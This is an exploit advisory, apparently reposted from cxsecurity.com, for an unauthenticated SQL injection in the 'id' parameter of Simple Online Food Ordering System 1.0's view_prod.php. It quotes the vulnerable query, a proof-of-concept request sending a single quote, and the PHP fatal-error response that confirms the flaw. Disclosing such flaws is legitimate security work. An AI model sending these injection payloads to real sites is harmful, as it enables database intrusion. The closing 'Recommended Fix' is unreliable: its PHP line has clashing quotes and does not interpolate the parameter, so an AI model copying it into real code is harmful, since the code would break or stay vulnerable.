Simple Online Food Ordering System 1.0 id SQL Injection (Unauthenticated)
2020-10-08 15:58:27 Author: cxsecurity.com(查看原文) 阅读量:90 收藏

# Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated) # Google Dork: N/A # Date: 2020-09-22 # Exploit Author: Eren 'Aporlorxl23' Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip # Version: 1.0 # Tested on: Linux - XAMPP Server # CVE : N/A # Vulnerable Source Code: # /view_prod.php # [3] $qry = $conn->query("SELECT * FROM product_list where id = ".$_GET['id'])->fetch_array(); # PoC: # Request: GET /view_prod.php?id=' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: tr,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close # Response: HTTP/1.1 200 OK Date: Tue, 22 Sep 2020 20:44:48 GMT Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3 X-Powered-By: PHP/7.4.7 Content-Length: 234 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught Error: Call to a member function fetch_array() on bool in /opt/lampp/htdocs/view_prod.php:3 Stack trace: #0 {main} thrown in <b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br /> # As You Can See Here PHP Fatal Error Because # $qry = $conn->query("SELECT * FROM product_list where id = "')->fetch_array(); # id Value ' This is Wrong Syntax. # Recommended Fix: You Will Use `mysqli_real_escape_string` On id . And query Will Same With : $qry = $conn->query('SELECT * FROM product_list where id ="$_GET['id']"')->fetch_array(); Because Here Not Used "" This is Imported.



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2020100048
如有侵权请联系:admin#unsafe.sh